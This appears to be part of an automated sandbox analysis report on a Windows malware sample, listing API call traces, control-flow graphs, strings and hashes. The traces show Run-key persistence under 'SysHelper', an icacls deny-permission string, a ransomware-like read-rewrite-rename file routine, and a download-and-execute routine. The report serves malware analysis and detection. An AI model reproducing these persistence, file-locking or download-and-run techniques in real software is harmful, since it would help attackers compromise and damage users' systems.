                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00F2202D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F22036
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F2204C
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F2206E
                                                                                                        • _memset.LIBCMT ref: 00F22090
                                                                                                        • lstrcpyW.KERNEL32(?,010102FC), ref: 00F220AA
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F220C0
                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00F220CE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F220D7
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00F220F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F220FC
                                                                                                        • _memset.LIBCMT ref: 00F22120
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00F22146
                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00F22158
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F2216D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                        • Opcode ID: 858227395a33e650d5413132bf5359c15b3904280ca94534aeb4261b51c5fb49
                                                                                                        • Instruction ID: 960151772c1c3069d62a638938a4d60ece35dfc946b48dd513811153b9e4b5d3
                                                                                                        • Opcode Fuzzy Hash: 858227395a33e650d5413132bf5359c15b3904280ca94534aeb4261b51c5fb49
                                                                                                        • Instruction Fuzzy Hash: 0DE17C71D0022EABDF24DBA0DD49BEEB7B9BF04304F10416AE505E6190EB746A84EB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F211C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1067 f211c0-f2121d CreateFileW 1068 f21223-f21232 GetFileSizeEx 1067->1068 1069 f218eb-f218fb 1067->1069 1070 f212a3-f212be VirtualAlloc 1068->1070 1071 f21234 1068->1071 1074 f212c0-f212d5 call f3b420 1070->1074 1075 f2131a-f21331 CloseHandle 1070->1075 1072 f21236-f2123a 1071->1072 1073 f2123c-f21281 CloseHandle call f23100 call f259d0 MoveFileW 1071->1073 1072->1070 1072->1073 1073->1069 1091 f21287-f212a2 call f32587 1073->1091 1081 f213b1 1074->1081 1082 f212db-f212de 1074->1082 1083 f213b7-f213ef SetFilePointer 1081->1083 1085 f212e0-f212e3 1082->1085 1086 f212e9-f2130a SetFilePointerEx 1082->1086 1089 f213f5-f2140d ReadFile 1083->1089 1090 f215bf 1083->1090 1085->1081 1085->1086 1087 f21332-f2134d ReadFile 1086->1087 1088 f2130c-f21314 VirtualFree 1086->1088 1087->1088 1092 f2134f-f21354 1087->1092 1088->1075 1093 f21440-f21445 1089->1093 1094 f2140f-f2143f VirtualFree CloseHandle call f22d50 1089->1094 1095 f215c5-f215d9 SetFilePointerEx 1090->1095 1092->1088 1097 f21356-f21359 1092->1097 1093->1090 1099 f2144b-f2146b 1093->1099 1095->1094 1100 f215df-f215eb 1095->1100 1097->1083 1102 f2135b-f21377 call f22c40 call f27060 1097->1102 1104 f21471-f215a8 lstrlenA call f30be4 lstrlenA call f3d8d0 lstrlenA call f1eaa0 call f32110 call f1c5c0 call f22d10 call f22d50 call f1bbd0 call f1bd50 call f23ff0 call f22f70 call f1c070 SetFilePointer 1099->1104 1105 f21718-f217d9 lstrlenA call f30be4 lstrlenA call f3d8d0 lstrlenA call f1eaa0 call f32110 call f1bbd0 call f1bd50 call f22f70 call f1c070 1099->1105 1106 f2160e-f21643 call f230b0 call f22840 1100->1106 1107 f215ed-f215fc WriteFile 1100->1107 1130 f213a7-f213af call f22d50 1102->1130 1131 f21379-f213a6 VirtualFree CloseHandle call f22d50 1102->1131 1182 f217e1-f2182e call f22d50 call f22c40 call f22bf0 call f1cba0 1104->1182 1195 f215ae-f215ba call f22d50 * 2 1104->1195 1105->1182 1127 f21647-f2165a WriteFile call f22d50 1106->1127 1128 f21645 1106->1128 1107->1094 1111 f21602-f2160b call f32110 1107->1111 1111->1106 1127->1094 1144 f21660-f21680 lstrlenA WriteFile 1127->1144 1128->1127 1130->1083 1144->1094 1147 f21686-f216de CloseHandle call f23100 call f259d0 MoveFileW 1144->1147 1162 f218a7-f218d3 call f23210 call f22d50 1147->1162 1163 f216e4-f21717 VirtualFree call f23210 call f22d50 1147->1163 1184 f218e3-f218e6 1162->1184 1185 f218d5-f218dd VirtualFree 1162->1185 1203 f21830-f21832 1182->1203 1204 f2186e-f218a6 VirtualFree CloseHandle call f22d50 * 2 1182->1204 1184->1069 1186 f218e8-f218e9 CloseHandle 1184->1186 1185->1184 1186->1069 1195->1090 1203->1204 1206 f21834-f2185b WriteFile 1203->1206 1206->1204 1207 f2185d-f21869 call f22d50 1206->1207 1207->1095
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F2120F
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F21228
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2123D
                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00F21277
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00F212B1
                                                                                                        • _memset.LIBCMT ref: 00F212C8
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F21301
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F21314
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2131B
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00F21349
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00F21381
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F21388
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00F213E6
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00F21409
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F21417
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F2141E
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00F21471
                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00F21491
                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00F214CF
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00F2159D
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F215D0
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F215F8
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00F21649
                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F2166B
                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F21678
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F2168D
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F216D6
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F216EB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                        • API String ID: 254274740-1186676987
                                                                                                        • Opcode ID: a1c203fb46b1dddbab9d495f5b8da5d7af11d8366111620da2878ddb44f3afe6
                                                                                                        • Instruction ID: 8336ddefcd9389f25a3ad47220e3de83b26ab2c7ebae3bf79098632229e97dc7
                                                                                                        • Opcode Fuzzy Hash: a1c203fb46b1dddbab9d495f5b8da5d7af11d8366111620da2878ddb44f3afe6
                                                                                                        • Instruction Fuzzy Hash: B822FE71D00229EFEB10EBA4EC85BEEB7B9FF04310F104159F515A7291DB385A44EBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2DBD0 Relevance: 49.6, APIs: 23, Strings: 5, Instructions: 565networkfilelibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1412 f2dbd0-f2dcea call f3f7c0 call f23ff0 call f256d0 call f23ff0 call f1ecb0 1423 f2dcf0-f2dd82 LoadLibraryW GetProcAddress call f23c40 UuidCreate UuidToStringA 1412->1423 1424 f2e459-f2e45f 1412->1424 1441 f2dd84-f2dd86 1423->1441 1442 f2dd88-f2dd8d 1423->1442 1426 f2e461-f2e465 1424->1426 1427 f2e498-f2e4a0 1424->1427 1431 f2e467-f2e46b 1426->1431 1432 f2e48f-f2e495 call f32587 1426->1432 1428 f2e4a2-f2e4ae call f32587 1427->1428 1429 f2e4b1-f2e4c7 1427->1429 1428->1429 1435 f2e477-f2e48d 1431->1435 1436 f2e46d-f2e474 call f32587 1431->1436 1432->1427 1435->1431 1435->1432 1436->1435 1444 f2dd99-f2de83 call f256d0 RpcStringFreeA PathAppendA CreateDirectoryA call f284e0 call f23ff0 call f22900 call f23580 1441->1444 1445 f2dd90-f2dd95 1442->1445 1457 f2de94-f2de99 1444->1457 1458 f2de85-f2de91 call f32587 1444->1458 1445->1445 1446 f2dd97 1445->1446 1446->1444 1459 f2e3da-f2e3e2 1457->1459 1460 f2de9f-f2dea3 1457->1460 1458->1457 1463 f2e3f3-f2e419 1459->1463 1464 f2e3e4-f2e3f0 call f32587 1459->1464 1462 f2dea7-f2debc call f24300 1460->1462 1475 f2ded0-f2df5a call f3b420 InternetOpenA call f23ff0 call f22900 call f31c02 1462->1475 1476 f2debe-f2dec2 1462->1476 1467 f2e42a-f2e44a 1463->1467 1468 f2e41b-f2e427 call f32587 1463->1468 1464->1463 1473 f2e455 1467->1473 1474 f2e44c-f2e452 call f32587 1467->1474 1468->1467 1473->1424 1474->1473 1491 f2df60-f2df9c call f24690 call f1dd40 1475->1491 1492 f2e031-f2e075 call f24690 call f22840 1475->1492 1479 f2dec4-f2dec6 1476->1479 1480 f2dec8 1476->1480 1483 f2deca-f2dece 1479->1483 1480->1483 1483->1475 1501 f2e014-f2e01c 1491->1501 1502 f2df9e-f2dfa3 1491->1502 1503 f2e077 1492->1503 1504 f2e079-f2e08b InternetOpenUrlA 1492->1504 1505 f2e01e-f2e02a call f32587 1501->1505 1506 f2e02d 1501->1506 1507 f2dfb1-f2dfcc 1502->1507 1508 f2dfa5-f2dfae call f32587 1502->1508 1503->1504 1509 f2e09c-f2e0bc 1504->1509 1510 f2e08d-f2e099 call f32587 1504->1510 1505->1506 1506->1492 1515 f2dfe7-f2dfed 1507->1515 1516 f2dfce-f2dfd2 1507->1516 1508->1507 1511 f2e0e2-f2e11b HttpQueryInfoW 1509->1511 1512 f2e0be-f2e0cb 1509->1512 1510->1509 1511->1512 1522 f2e11d-f2e15f call f23ff0 call f2e5b0 1511->1522 1519 f2e3c2-f2e3cd 1512->1519 1520 f2e0d1-f2e0dd call f32587 1512->1520 1518 f2dff3-f2e011 1515->1518 1516->1518 1524 f2dfd4-f2dfe5 call f305a0 1516->1524 1518->1501 1519->1462 1528 f2e3d3 1519->1528 1520->1519 1535 f2e161-f2e16f 1522->1535 1536 f2e174-f2e19f call f2e5b0 call f23010 1522->1536 1524->1518 1528->1459 1535->1536 1541 f2e1d3-f2e1db 1536->1541 1542 f2e1a1-f2e1a6 1536->1542 1545 f2e1ec-f2e248 lstrcpyA PathAppendA 1541->1545 1546 f2e1dd-f2e1e9 call f32587 1541->1546 1543 f2e1b4-f2e1ce call f23d40 1542->1543 1544 f2e1a8-f2e1b1 call f32587 1542->1544 1543->1541 1544->1543 1550 f2e24a-f2e24c 1545->1550 1551 f2e24e-f2e250 1545->1551 1546->1545 1554 f2e25c-f2e293 call f256d0 CreateFileA 1550->1554 1555 f2e253-f2e258 1551->1555 1559 f2e353-f2e358 1554->1559 1560 f2e299-f2e2a9 SetFilePointer 1554->1560 1555->1555 1557 f2e25a 1555->1557 1557->1554 1562 f2e366-f2e380 1559->1562 1563 f2e35a-f2e363 call f32587 1559->1563 1560->1559 1561 f2e2af 1560->1561 1567 f2e2b1-f2e2cf InternetReadFile 1561->1567 1565 f2e382-f2e38b call f32587 1562->1565 1566 f2e38e-f2e3b0 1562->1566 1563->1562 1565->1566 1572 f2e3b2-f2e3bb call f32587 1566->1572 1573 f2e3be 1566->1573 1570 f2e2d1-f2e2da 1567->1570 1571 f2e314 1567->1571 1570->1571 1575 f2e2dc-f2e303 WriteFile 1570->1575 1577 f2e316-f2e32e CloseHandle InternetCloseHandle * 2 1571->1577 1572->1573 1573->1519 1575->1577 1578 f2e305-f2e310 1575->1578 1577->1559 1580 f2e330-f2e332 1577->1580 1578->1567 1581 f2e312 1578->1581 1580->1559 1582 f2e334-f2e34d ShellExecuteA 1580->1582 1581->1577 1582->1559
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F1ECB0: _strtok.LIBCMT ref: 00F1ED66
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00F2DCF5
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00F2DD01
                                                                                                          • Part of subcall function 00F23C40: _memset.LIBCMT ref: 00F23C83
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F2DD3C
                                                                                                        • UuidToStringA.RPCRT4(?,?), ref: 00F2DD57
                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00F2DDB4
                                                                                                        • PathAppendA.SHLWAPI(?,00000000), ref: 00F2DDD3
                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00F2DDDC
                                                                                                        • _memset.LIBCMT ref: 00F2DEE7
                                                                                                        • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F2DEFC
                                                                                                          • Part of subcall function 00F22900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00F22966
                                                                                                        • _wcsstr.LIBCMT ref: 00F2DF50
                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000), ref: 00F2E07B
                                                                                                          • Part of subcall function 00F1DD40: _wcsstr.LIBCMT ref: 00F1DD8D
                                                                                                          • Part of subcall function 00F1DD40: _wcsstr.LIBCMT ref: 00F1DDB6
                                                                                                          • Part of subcall function 00F1DD40: _memset.LIBCMT ref: 00F1DDE4
                                                                                                          • Part of subcall function 00F1DD40: lstrlenW.KERNEL32(?), ref: 00F1DE0A
                                                                                                          • Part of subcall function 00F1DD40: gethostbyname.WS2_32(01010134), ref: 00F1DEA7
                                                                                                        • _memmove.LIBCMT ref: 00F2DFDD
                                                                                                        • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 00F2E10D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2E229
                                                                                                        • PathAppendA.SHLWAPI(?,?), ref: 00F2E23F
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00F2E288
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F2E2A0
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F2E2C7
                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00F2E2FB
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F2E317
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F2E324
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00F2E32A
                                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00F2E34D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
                                                                                                        • String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
                                                                                                        • API String ID: 1843630811-800396732
                                                                                                        • Opcode ID: 7108e9f923937423c07c22a77306b4f26d5ce00ba6f5330f325700be41074b66
                                                                                                        • Instruction ID: edf47ad896b3fb7a688f478406a40978039086b1eb43c482cd0543e5f6a1cd28
                                                                                                        • Opcode Fuzzy Hash: 7108e9f923937423c07c22a77306b4f26d5ce00ba6f5330f325700be41074b66
                                                                                                        • Instruction Fuzzy Hash: 1832CC70508391DBE730DF24DC09B9BBBE5AF81318F24091DF5898B292D7B69508DBA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1583 f22220-f2228a call f3f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1586 f2228c-f222ba LoadLibraryW GetProcAddress * 3 1583->1586 1587 f222bd-f222d1 K32EnumProcesses 1583->1587 1586->1587 1588 f222d3-f222de 1587->1588 1589 f222df-f222ec 1587->1589 1590 f22353-f2235b 1589->1590 1591 f222ee 1589->1591 1592 f222f0-f22308 OpenProcess 1591->1592 1593 f22346-f22351 CloseHandle 1592->1593 1594 f2230a-f2231a K32EnumProcessModules 1592->1594 1593->1590 1593->1592 1594->1593 1595 f2231c-f22339 K32GetModuleBaseNameW call f30235 1594->1595 1597 f2233e-f22343 1595->1597 1597->1593 1598 f22345 1597->1598 1598->1593
                                                                                                        APIs
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F22235
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00F22240
                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00F22248
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F22256
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2226A
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F22275
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F22280
                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00F22291
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F2229F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F222AA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F222B5
                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00F222CD
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F222FE
                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00F22315
                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00F2232C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F22347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                        • Opcode ID: 0f4d5809731cbdbd200076b54e2f5488b73e2f7be5c23efb14af9f688db238fa
                                                                                                        • Instruction ID: 027481fe0bb6f3984bd14ee2f382873231a77a6494f0eccd12d2cbff97a58a63
                                                                                                        • Opcode Fuzzy Hash: 0f4d5809731cbdbd200076b54e2f5488b73e2f7be5c23efb14af9f688db238fa
                                                                                                        • Instruction Fuzzy Hash: 00318D71E0121EBBDB10EFA59C49EAEB7BCEF49314F00406AF544E7150DA789E41EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00F2F15E
                                                                                                        • Sleep.KERNEL32(?), ref: 00F2F185
                                                                                                        • Sleep.KERNEL32(?), ref: 00F2F19D
                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00F2F9D0
                                                                                                          • Part of subcall function 00F20A50: GetLogicalDrives.KERNEL32 ref: 00F20A75
                                                                                                          • Part of subcall function 00F20A50: SetErrorMode.KERNEL32(00000001,01010234,00000002), ref: 00F20AE2
                                                                                                          • Part of subcall function 00F20A50: PathFileExistsA.SHLWAPI(?), ref: 00F20AF9
                                                                                                          • Part of subcall function 00F20A50: SetErrorMode.KERNEL32(00000000), ref: 00F20B02
                                                                                                          • Part of subcall function 00F20A50: GetDriveTypeA.KERNEL32(?), ref: 00F20B1B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                        • String ID: C:\
                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                        • Opcode ID: 8de8ebbda8f5b6f0764641484750e9368cf0ad71288220b1c47d128379061dc8
